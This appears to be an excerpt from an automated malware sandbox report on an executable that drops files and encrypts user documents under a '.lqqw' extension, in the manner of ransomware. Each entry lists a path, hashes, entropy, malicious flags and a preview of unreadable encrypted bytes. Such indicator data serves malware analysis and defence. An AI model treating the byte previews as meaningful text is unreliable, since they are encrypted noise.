                                                                                                                                                                                                    Preview: .w.....x...|..y......K.-*.FL........?C.S...#.t...4..l.s.Y..._......)....n.BD~{.s..g0..^#*.,..kg).b......%.S....^&.....N..e.2........J&|..9N.-.k....0..;..s.p[2`....)c...j...\. }.b5=..4.E..c......"0-*...6...~.y.()...E,.X.$Ps.|....."Mk...7...&.Z....T.As%.T.#Z\mV.!8....R....R..].V....Vz"2L].........VE-@}.q.r....iMBy\..h.gt8#/...+.r.H.O.[$.a......}.$WI.5..H......#...z.V../S. 7......8.W.......nU,i.*..N\63.....Qp.9......C.1q...{r*]-...4[..F..St\b.....A...B.$.jc..S...:..Fb.....J.D..@.<SH...rzg.-a.....:.x...:..x.I.}.?..U...B!.z/......R. ...v.3P.9.4B.g.6.'....%9.p....`........~T.+.2..)y^Y.7.J..9.....1.7...........4z:1..2.a....>.%.E.a.,l...5P.N..g...._.H<.Z..%.....Dy..$..e.l...`L.|..Ze.g....#6.a.......u.vA..fM...n...?.H.H..@...+..'..{.p*j..>y..........\.f..c.....Wm...!....=....q...5....B.|..'.X.oH.HY..T"..(.y......./X..:sT2.,].t.z...9E.-*C....T9.i.{..9......K..\...Vb.&.....&.....'.iG .. ..\u....q..m.K!.....OP.F...r..5...LOI.hfq:.....oQ....m....
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1378
                                                                                                                                                                                                    Entropy (8bit):7.84461934416209
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:4OpRqJFlUh2N1Hv/MoNrZN4GHPeh8IbkI2JC7TbD:PpMJFlUwHvxBZGX8xUD
                                                                                                                                                                                                    MD5:C4681AA52E129DB902049FE748EDF152
                                                                                                                                                                                                    SHA1:37EA800BC0EAD2F8D48575BC0676323E146DC638
                                                                                                                                                                                                    SHA-256:BA24DE4F548FFCBF3CADD7193D42EC7AB876BC0801455ABDC3968CA6BE94C6E7
                                                                                                                                                                                                    SHA-512:5B3A2BB8BB6055ECEDB221C66D7612F62F0AF417F05A4B07CF6A35A5699EBCED8980534D8C7A45624D78A0E6F913DC9FE36EAF8E04FE4DD6DBBBE106005723B5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...",Mx....H..V.......CI..l..9.A,.Xy.Q.F,.....'.....&.......$...rlSJ:.T..D..MS.......|m..5'.u....x...s...e.u#.&*..p......\.(u...`....N......yR.....%v.r..m~_.e.....yal.....O.8...+.]A...?.D...!...>.mt9..6...;.;.....u....&.........]..xn....4..*?.].&..@......4...6*..$...i-......W....n..e.9N.m..t...%...me....(.N...fD`.p....]..p.H..N.D..pk..iC...x......*..}....~.....R.,..hS.....;.bH .NQ -..B.Z...L.|X.IiE..-..lJF....~.r.......EmhS'.k^<...f9..3..=O...r6....j,.#u..Z....p..e.emnL;L.....K.r....0....p.*...H.\.5~7h:$&.>z..xjB.l...IL.L$$m.?....%...M..$...$..?I)$.KR[..p....S.Cd...V.....=#`..1.-...7Q*..0%..?.b....\...q..#...U...9P.).....h^..Z....|.L\e.B&v.0.4"......._.V....bd...\._.e.........&.|...(....lG.v.Z.@v..\B..df;G.......x...?{...%w.V. .D........A.i].3X..X^z..U...j.fcX.....%P|>2.Q.....6/.....P.......Y^.j..ei(A.G._.o.-F*..%.m..I<.tj.w...\..9O...u.BK.....&G.......}B.....6=tH...M....''2R..B.>..A...@...q.s.{..F.W.f]...y..4...i[..<...d1+
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                    Entropy (8bit):7.14625817883756
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:WSKSU5PkBfBL6lSEqsvMtMbBgCmI9wzzJf3N+W3VN601D3+3i75dExcii96Z:/HU5ufBOFF9aewfh3Nn3VN60ZGXcii9a
                                                                                                                                                                                                    MD5:93752DA882D34119E3B1279D82A1812C
                                                                                                                                                                                                    SHA1:61CFF282F2AB4011625D5072DCDD9122BD9EC29A
                                                                                                                                                                                                    SHA-256:AF95D9B9A8067110B8455BF3A701DBE6621114A8B08590EA42C9CE9C4FB87270
                                                                                                                                                                                                    SHA-512:0328D552841C6E10B66129399B68D5EF0FF0CBBB759D9F10537B7C95D66BF6DEF92516FA834896B25BBC9B655ABA0D9666660D6460069DA28C4F2E9F138B30A3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: @4C...}......Jf..h....z....4..*.?S05A~!.m......V.l%..;.I.....C_@.+.}cO.1)...az..ah6...t.....t.c........`.O...S.i..Y.).l.Wg.&UD.q...IB..E...E.p...fmB./.$tS!cn....pm..J..;u!U...kd..@......i..{3. .z...?tu....d..rW.!..m.......eP..F...a~R*`h.n.C*M].5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):74325
                                                                                                                                                                                                    Entropy (8bit):7.997641382774279
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:gXTxGHQ4WYNMR3qHGGyImgWC2k+hT/tUA6SI+ca8T+rHWuKgox:mEHQHYbmGyIcCp1R/JqHWuKBx
                                                                                                                                                                                                    MD5:840FCDB2C67D41EE7A30EF6CB04E7E5E
                                                                                                                                                                                                    SHA1:C187F0C14CB7A395A26DEEF2FEA95531287AE867
                                                                                                                                                                                                    SHA-256:F349C86FCD728007D9ABA71901B72FEDE67275B93F5D63224AFD1850170A070C
                                                                                                                                                                                                    SHA-512:637037F1B01840CF272FBCC1F9A01DDDF1A6533474C00D0867C1E8D4795DCD927A28F71024D2F38DA1EB18DC2B970D7B26DEC0E923302DC66B92A07AE298F17A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..p....(.T......7...j.D..+B.G.Pt.X.Gn2T..^.E../x..nR..._E.`..'w~.Q...........Z..y..w.....O...z....5..Cj..-_K..............^l. ..7...<...p...Rx$@]OGD.t..{ ....i&;dkMC.{j.....X.W....Yi.[._..ji..\..G...91.4....Sj...%....+........!5..K(.\\.KX%..w........)F..q..K..6Q.u.2....*...?.....>a.m.mQ|.......JK..._i.e..V...77.~.d......E....2.xj....)G.ZP...}-...........z5..C..Y..*=%..p.rJtgTvN...T.7....^CT.^..bv..f.bG5K..HN......U..Q.......I..{..,.....p..V.-^?...'#y"U.....X.OF.9..x....l(2....=...B3..4k....}X....p[*.J.nRC.yN......&.4p....4....U....vj...]...-:..,...MtD.....wty...w.(m..._..U.AB..z|..%KA...{h..l..#...N..>.vu.&.<....E[...6......A...*....N-...n0.0>fE..E....X.g..G.._E..)"`.}&...[.K...X........;LX.').{L...r3t..9yG...zU............2..t.j-}....e ...`].].....77..u.V...F.9]...>.\.... .......Z.5..:.~......J.........g.....4...96&.+X$Q....C...Q.......Zr.$&.Fo..qV..[e2...s+.'..x.\,..x..e.}..$.........}.s..O.i...A.a._(...._.......B.....W.....z...h.
                                                                                                                                                                                                    C:\Users\user\Application Data\Adobe\Acrobat\DC\Security\addressbook.acrodata.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):14785
                                                                                                                                                                                                    Entropy (8bit):7.987582397547786
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:E7Lz7aTY/+RrWiYetqanIfjukNECCRZBz6cu4:E7Daa+R6iYraWjukGCeZBz6c1
                                                                                                                                                                                                    MD5:C97BEF25C162E97AE7657D646141AFDC
                                                                                                                                                                                                    SHA1:6EE3A8DA07FF581C99F37E96E9043F95DFCFFDC1
                                                                                                                                                                                                    SHA-256:E6E1DB7047D34DBCCA727AB0965A55D992A816F698D1D4F4C86753B99C32038F
                                                                                                                                                                                                    SHA-512:6839FFC31AAB169C3815596346DDA32A307ABC7C9FD7F302CB9A2AEBA62F551D2B819AA73CE67DA5D4FB875AF970D48FE6C29FEE753643C2531AA25EABF71430
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: P....l..3.E.H.NN...$t.j...oo....1..H......{...7...X.!......d.D:.Z..J...=S..U....x.(........T.........I....fd.5..[.....=.DE.....l..1..r.L.......%..<...C..........C_v.'S...<.XDB..)1q0.XyQ.8...:.....O..4..A.^H,.....*.M.5My..MXkm...a.X.|..6.%....=..Jz.+...=O.rn%.3..k,o......Kz....V...&.5k{.....a.-iW.....^S.R...O.E....%..x...F......H.0....o.1........\-}..emu%...\...B.Q8f2..|.............b.....w\-..qN.p.F.\....2x.,=(.....uXeiDA.\.=s.V.xU.,K....."..Q.`H<....(..!.?L.(....8|...@..?@u.&14.T.@.~.}P..<.D..%...8......E.y.6fT.^.M..x;..,....U.C....7.~.{.M.8m.6..:TU.....;.p.T..I....6.0n....u@.J....a.i..S%&| ^.B...uW...c>.P..lF....?.!N..........1>...Vkn.?.Y....(F.p.S#....}l~gx.V...x.......'P.....7t.s.d..:..m_...[iT5..C...l..m.cz.Z..=.`..D|.....B.bH....[j.v"..Z.....@.E...I\...7I..9.O.7;yH-.$p......=..HM...qQ......r\H.@.?tB]....y<.l.....z..{'ES.!....Ol...c..r(.<.n(....wu.`f...|.m..P9.Ka...X..%V.Wu...g.'.y..A.<.7..'........A2d..-`..b....yM.\..2V;<.t.5wi>
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99903161834526
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:TfnfjnhG2KG9NTynqaKErpFBZJYdgduagXEZxdg5VgwHAN1I:TPfjnI2KKJynFn3BZWdcuauY85Vc1I
                                                                                                                                                                                                    MD5:324C4066FE135C43FE616EA826B9CFD7
                                                                                                                                                                                                    SHA1:C601DC419DD464508CD765BBE1311C5B9E1D1411
                                                                                                                                                                                                    SHA-256:55E0D5A6F2BD0B9FD0CAD902DA7E90054DFF9B1CAA40FB92D8EEC2F6AA214D9B
                                                                                                                                                                                                    SHA-512:EA5C79128497AFBFAAF1D3C98EE2792DA0F50FDEFD1768D7FC36B38EAE109B01127056660985B492918EE24C998651224FDB048B4CB29597CEB74ACBE21278DF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: q..~HO...?Ikn._|.....$...'.Mg.i.o...$..w..a.....@J).Z.F]s....w.....k.),..R"kr.S.r!lV....O n..p...ZlU.../'.w.D...k.....8....gDh.k..!..xw.....].L3..1....`h.j....s.I4....5.......u7.K...nAR....\b8.....v....3q.v.....;R]._Q...Em.....x.{#Sam.+G.%.....+:...S..4..n....u....ztN....I.....u/>{..u..XIm.&.]>p^...X.F..1.m..........z.C..i......Aq..00...O....y..n...........D.......H....!.\.....23Lf..U.4mmK.v..&~ ....3....x.%...w....A4T&m(,s\7.C.....aCA.:..w..L.}Ls..-......=*..kni...x....}./.~H.m.....f...bwu>'.Z..D..6".u0.zWn....wG..m..V..............~.Y.B.u.D..x...\f..J....bZ.........B...qs._...x...B.z#.a(....u..:[....|%....?O.`&...L.v..1[v_M.H.j.........z..9.;I0.....:..a.D.@..XJ....z;.*r.#lt...o...0G.c...G..../...M\..K.hJ.X..G...z.....P....p.?.O2..0.t.Q~7fH}.....y...8.(;.:.&c..G...$?.H..Q..).t..n.6.g......BbZP...).C...{.:...V....5w..):...Y%.U|p7&.....X.V..7$35P.s.....^..8........-9X.............`...kQ^..cN.Xs......./......w....z.%..........Q..u...)eM...| ..Q
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\CHICAGO.XSL.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998834562207103
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:N92Y3kfKvffZ2hLN4yhSIO8PhzDQboYQEqStUwkR2dosX1m9tFPNb4tS0f:N92YLHZwLN4QO8PhY5d82d38VNbmf
                                                                                                                                                                                                    MD5:4D65BA807CF2DC3A24194185D4E7262E
                                                                                                                                                                                                    SHA1:2F1079AA67F77E79C016DDF68A4609BAB604DC54
                                                                                                                                                                                                    SHA-256:D7431458C9EB2B0316B36B8AA0B9CE48EFDB93D286D842D079BC77DAD39F0C1A
                                                                                                                                                                                                    SHA-512:DBB6A78D3F6DD14F316EA3B18F3C75EDF76FA8187E79283451660145154961FF5D88BF87545667ABA21620EF7565EE7ECD9FB5F358E7014D3B8DA9A5D962D13E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....:(p.,......c..\\.-.,lNP.....~.............t.E%8.:&.-...*.WPi1...Q.Lq.2...R\z..=...]..R..;..#s^k.G....f...'...Y..yD......e.....+..{k......1.8jky..............!.1.s....sKo....N.@.U...St8.zk...Q...$&..~...#.TS..f.e...=rm......Qv.a.......).o.F...np}....KO..cKtud-../...C.{.y.N.....,..o...^"g.)..u.M...9..Y.ucj.A.."yF..Y-.a.1.T.meM.:.NS..z...b*e2Nh...V...CX<.8..3./.I.h.b...}t..:T#4..+.O.....w.F..o..h.N.d.'y.s.X.PYb... ..yR...2..-..I..B.7.M..WC>ZQ...{i..b...A..........I[..!i...W.vP$F.L*.t.......Z..M.._..0..V.X...C.\...D{..|F.9n.q...e....U.tM..g>L.uw....{..W..#.Ll......Is..W.fL.gH.....i...\.c..B^^=7..|U@.F..m..1..[...o....S...9.[......4'uD....*......e....&O...wl.U...i.Mh..;.`AY.lU....oT..Qo.~.U..'..D.#............>\.w0y.....FA..*............r&.["...n....../.q....t!z...i.ja..S..L.."L.R4....kl.o..q!{xP....2.n....B.):,A|v..{&..pRn.9...R...^P..y....^...KC.W...._..JT.I...|q..3...B?..Le..R....{.`...,.....Q_..ul?.1.x.-.L.. r.}/..o......)..(#M9n.!8...
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\GB.XSL.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998750026033605
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:zVVxwgFPvcrBeHqw78F/OtIVLvRHOWBd16nkp+yLk2N0d:xVygV0rBeKw78Ymv/BSV2Ng
                                                                                                                                                                                                    MD5:2405BE452D8B8DF4D1EDD7B3F7142F76
                                                                                                                                                                                                    SHA1:230BB669CAB1B9B54A5C009EDD42376F75034014
                                                                                                                                                                                                    SHA-256:706F403951710644E93FC86537295E597DC20E7D328BF81886138DB1D1039AFE
                                                                                                                                                                                                    SHA-512:C1FB42A1FE180699EDB492950AC017BD81D1B8AAC3DBEE855A5B833AF945B0B984160016C269D64CBBD16EBA2C55CE46F45DDA4479AF2348FC0F2D43DF5DC468
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: P.3...V5Zd,........ ......!*....;..w.wY..O.>G.8...2.!..>.2..v.+B.w..nK.rJ.\l.D.Q......v.....$.....E.5W*..b..P......%.vA..4..G..>.8u.....o...5:B.r..]Oq.....-.....k..[.3k0...L8...vLv..^G.`...a..R...F$.;..ZP..\6u z..,5....f....m\N......C#c.OC...o<CC2.]...(........A:....G.`P.r@)..........V!I.9.....|E.YU.c..Q.3.|........yVk..._y.....;...,.$......6F...[.....q.W...md.E...1.3H.\..-d;.+...3.X8..:M....O..Y..!..'.r.........}0.b.t1.R...ag.t....k..?c%....b...b.@..N..].]aoWr...b...^..A-.Ho...M........|?.v..I..os..sp....N.I....t..1...x=.....}..[..].{.S.\...X.n,..{......1..|z.."......j.Y......tp.IX.JH......V..A..DC...tF&..Fs.#......55r2......r&r.k.J.K..#.mp...J*.<t.b6Z".t.Y=*.-..$.........J..C=+......M..I....y..P?......f8.6..2Ia..::U.."L.....*...nC........T..9't_....X.....$N.....n.b..Bl..b...0.K...F.K.Z..H._P.zZqm.....K.C.!...........yg.]O{..I.......2...;s.MO9..!o..).cS.8l...=...F...$.p..$=...79.<Y..J..;.A...+3uD..Ec..p.b....G.~...ZLZ!..
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\GostName.XSL.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99882036987836
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:ljjrAi8EusTYmFHfhs1a+tfJ2STPNI9iAIV4CeqKsJWLwXANfca:ljwiKeH0PfR5BCCykWUXafca
                                                                                                                                                                                                    MD5:6FB4FA007C424F1AD6D24F46C691B9FD
                                                                                                                                                                                                    SHA1:74A3CC18AF87C3DCF2B23ABB997E147E763B2EA0
                                                                                                                                                                                                    SHA-256:2D30DEF6D0BCA5F576A1E228E9EA3F6E14134BC11D744B6CFC3BE7486E87AB64
                                                                                                                                                                                                    SHA-512:AEBDDDF71682C715F2F94E8222CBDC82878F622691E65FA3853B36BF47FF5B5DD5A1669F1E9288E7DB877780E3371CDB37E48E5BA998003FD33E8C5F5BB0FECC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: /....&.|...Aq$.v%).7....Br#.g.K.&.....C.w'..../.tB,U6.C.CR....,..Q..%)8...}c..E..Y M*.i....:...?.t. c......Pm@..c&.w7.iM'.R..5N.._.o...U..2~..<U...~....e.....YZ...d1.3..l....8H.+....m...<..` .Hwa.....Y....%...z..3YT..."i@YW"r.s*..4..h.o. F|.....A.`.H8k.....2X.:.$...2}rk.6vj..h..S..S....q.i..Hf.x..}.....o..Hp.........qIhm.=.z......$.....es.*..mm....=.z...;..'c1M..'.d'#AO.S./.|......P.+....].S.9...2"..K.&F..H......bUx..KT......5?.q.8Gl-o=.bJ...X...vSv.ci"..m.f.......^..G..4...|..|.".4.M..|u...7y..5v.jX..('.qO.!.n.g\<R.oeX..%.<.......q`KP;.R.....t.&...Od..d..p5c.G.r`H5."........3@_....x.$l.}A...J.............$...0.9#.......0/..1..2.B....9%..m...t....[+H'.C..SF..!^.xu./E.....S."}.Tn.q3........Ej..f.^.._(N.....QlT2..t...@.|Pa....W6..........m...!....3R..'..bpc|.}.Hs ...W-{=&.6.....>}\.G..U5.Zf...:..!;'....Y...........jS.=.....N),...4.@.Q.%.B, Jm~u.z......0.b...x.0..?.G..%pq..X.....C......Y}B.~.L+.Y..9..<].t..p.~)4.^.i..[...:B...'..B..j.\7....h}g$
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\GostTitle.XSL.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998994449898667
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:TnIloDgHU3BrvT9Sn1ug8Lp2+ca9dDvmBGP9n/OQjJvO04InGGARqh/:MO3p9AfOcazDvE2/OWZO1gGoR
                                                                                                                                                                                                    MD5:4BA26A4D8102F5330BBAF11E2961E00D
                                                                                                                                                                                                    SHA1:B5415BE2C61E9F94169F59647C561FBC66070EE1
                                                                                                                                                                                                    SHA-256:767200705210E5DB9B03558CA7CB9EFDDB807CE74A0061880AC407A99B3BF195
                                                                                                                                                                                                    SHA-512:95F087676A488669FBCD8F6796350C091D9219DA832B1A9F27C8497E14298D66C668278B398CC3FCC9DD33DA6F2D96DE804EE7A9C4D5AF41EBF87CD1CD2F956C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .U...J.w.)YX.rqKB8@.vQ2L...+..T&.4.P.....!w[.^!..|0Bq.].XO.^'.....}v.@kj.'...(..y+fkvO.H"..Ul1......S@..C..`.H!..q...m..1.9...+2.....Y.H.......c#(.b....F..e..7b......V.%ae..:...v.?.jGK.![;.....+.`.....x...(}I..1...(`..c.o...(.oBA..j......r.GE.on...fkWm.Dk.w:..Z.../@.{...../VZ...K2..q60._q_.#..c..i...&..Y........&R..R.LL...V.N......(]/Qh}.Z..Ck....._.....,c..;3..a.J...$..#.......*..0b.m..?...!'>.....N..O.....9.-;...M.=...U.[.@.T^.m.iB.q...y..!....L..|!0....<...[_.(..:0.7FJ..t.z...Of..}...N.j.........7....y.FD..?...[P..!A..z..*.vLV.P.d..8)O...(.!'-... ..J..QC0U...D.......].....+..1..#MN..yx.96H..ub.`.A.b..*%nwq.E...#0.@..6.'P."@/.Az.O......8....^=.}..D,.6..W>Q.Wr..`.NX.w.W...v..a.sb.,......S.3..H3....K.L8..z.- .f.`...Zi..6HF1Sd.V~.G2..B...fL.k...........I.....6).Z..kM.-0...^1....c.L..I.W..!N.C.JZ...b*39.../O.v........'+.f....>).x_>..h.ka.....>..i."..&.....Q[....;VB.... ...!...2....e..#..0.n..h6.U/ Y..n.......2....=.qO.t.%...b:..%...uK.......
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998746731844698
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:H5crOwqj4cn8QUR+WlrTYuo03MEy9p2aHimCo6:HUOww4y3ZWtu0NaCf3
                                                                                                                                                                                                    MD5:3D3A393DA3B8446A8652A5D95F56359F
                                                                                                                                                                                                    SHA1:B3DA3A0666353784DB490FD90C568B51A0DAF410
                                                                                                                                                                                                    SHA-256:CD200E46C97C6F4D90ECCA4C6C3EF327EDACCA5DAD113608FFE28459376DF3D3
                                                                                                                                                                                                    SHA-512:19BFA1127FFEA4C8F7A2437D5A81F788492C454FDBA485E4BFB0319CEE2628711B6A556CEE25CB94F0C2E43CEA5B67070C82097C53D664478039CF23A7E3FE06
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ,.V.J..."..._.. .c.U.g....R....VA8d-..O.A....b.?.8...X......V.....:#..}w....Go].<.D..T.^g.l#...S9h0..........N.xb..(6.Y.:...`.kn.8...f....FM...1.<.z.......R.Y....=o.....~...N..L...O..9.f.....p..3%V.F..kN.hd...NH.o..N..|.4.I.%..~..e.... .v.;.M......H...{(.+..I.nY..j.t..,X.....Qs_...:.Q.....]8.ts.1P..VDV-..U......w.J.s..,....{....o.^Bt.......2.K.._..h...$B....;............$9<.o.C....F.....q.=tAj.S...^m..O..t.:..............(M..0FplG...|.g....< <..Ch.-..Y.....l~z.W{.8H....T...Hwt..0..9....>...{.%..]V...A.P..WE...Q(X.y0....%/.\S..U"...x..M....].8....{.O...6...9f..../...j.D.O...*.l....O........I..p...@....D..c.u.5.tJK." ....jb.0Gt8D.....8..$...S.4.`....".y*X.l.I:?/.1+.........v....?..D.D&.t.p`. .j..8....m/PFy..X<..P+.n8...s....8.j..u....Yj....&......`......_`...:5#...[.../[......:i(...oq._..D......'.B.L.......E.8.?n6C".whB.....gSTi@*j..a..m\.....5..f4..~|..V.F8{..Q.[.b[.J..j~gTp.l./t.|..']..,xt....t8.?....*.~t.T39..,s.l).0...xuUB~..
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998733155364899
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:e/8k9fapr/ARvChvG22UYpuQvNx1VEe48Wg28qSYzKqgGZ:c8k14/skvQtpuQVxJ48t28q3HZ
                                                                                                                                                                                                    MD5:CAC450AC5E60DB2EB2E2031AD9D925E2
                                                                                                                                                                                                    SHA1:9E7DED169D08EA8424B68FD90E9EB890EC26164F
                                                                                                                                                                                                    SHA-256:8495CA177536242CAABB6C12D3A0249EB56A4044698E15F2B0A3F2C23A582796
                                                                                                                                                                                                    SHA-512:AE62D90361BA3F200CAA94432F6113678583F2E54615A0890C8197CD7E46F702577F725B165B99D84AF7CC3D4FD6F04BA1CB6C00666CACF994964D52B87D9353
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...c._H.{6....R...G..B..Y.. ._.....mz.k.GF......Mn.C...Y+..o......L..:&.).g....I.m4..Ly_:SbU.S_....|.0|.nX7kZ.W.F5....W!..m{6&d7. =.~...~m..k......%uh......X..K........r......sB..(l...uIv;.....y.Uk.vb............^.W{...7......`.@..2..Y3jv.j$"u#..T..L.rJ...f|.G....#.f#X.>...g......%..........v......3o.....jJ..,.:;W ..zKE.^wz.(..F...o!.[....e.x.t.....0...6.Y.]sh....n.....-_.s.].G....n.H\.^a....p....F..f.<+v.`"K..H@B..].3T..r...c......=.F.....Hy....6Q..37.e.f..Gn......n.& ..T....0."..n`.....{V....i.{...Z.6{-&.....Y.c..IeyC...4...9.....yC'h.2Ue.dU.....h..n4..m.N*C...ZE......o.s...`.oP[*...heD."..YzT<A..|OC....^.O.....@...}...W]V.gF.gl....p.Z.r?.........2.xz.x.=...i.....:.5".0.].@u.nL?....>....,..h?k;.....'.o.p..F.U.e..,/L.,...4r.b]....A..P.Y.$..L....}.a/l.bg.r..y...5w.L.5..nvN...t....{w.mQc8....W..S| O.5Hi=.S..G....,..P'm.P....2;.7e...kS`B.2M(.lL...'......0..Z>...>.....5*...a...V.,.Z..U..m..Nq...TI...\._N.....1G...48.._2....
                                                                                                                                                                                                    C:\Users\user\Application Data\Microsoft\Bibliography\Style\ISO690.XSL.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998756256781089
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:bBoGPUypY5KUyxvQF6Dda9SLXgTe8sg2iP3ckf7QL9StdV1h:b2G8ypYY1vQFwU0gTJsgUk0L9ydVb
                                                                                                                                                                                                    MD5:4419C576A1173DF6A15922757662CF08
                                                                                                                                                                                                    SHA1:67F4DF77A45801F8F7F131DCF038BA1AC77675A0
                                                                                                                                                                                                    SHA-256:7979D7D5D0134B4C368A308C8F061AE2402E355954641D26B78769B141558813
                                                                                                                                                                                                    SHA-512:389F628022E22A91219D58BE1EDB2555B2215ADB2B5FA2BA98777B037973B10EDBE50505D2445CF27C2E6290EBF5FC110D1A5BB87F7754EC59EACE51FBB230A7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
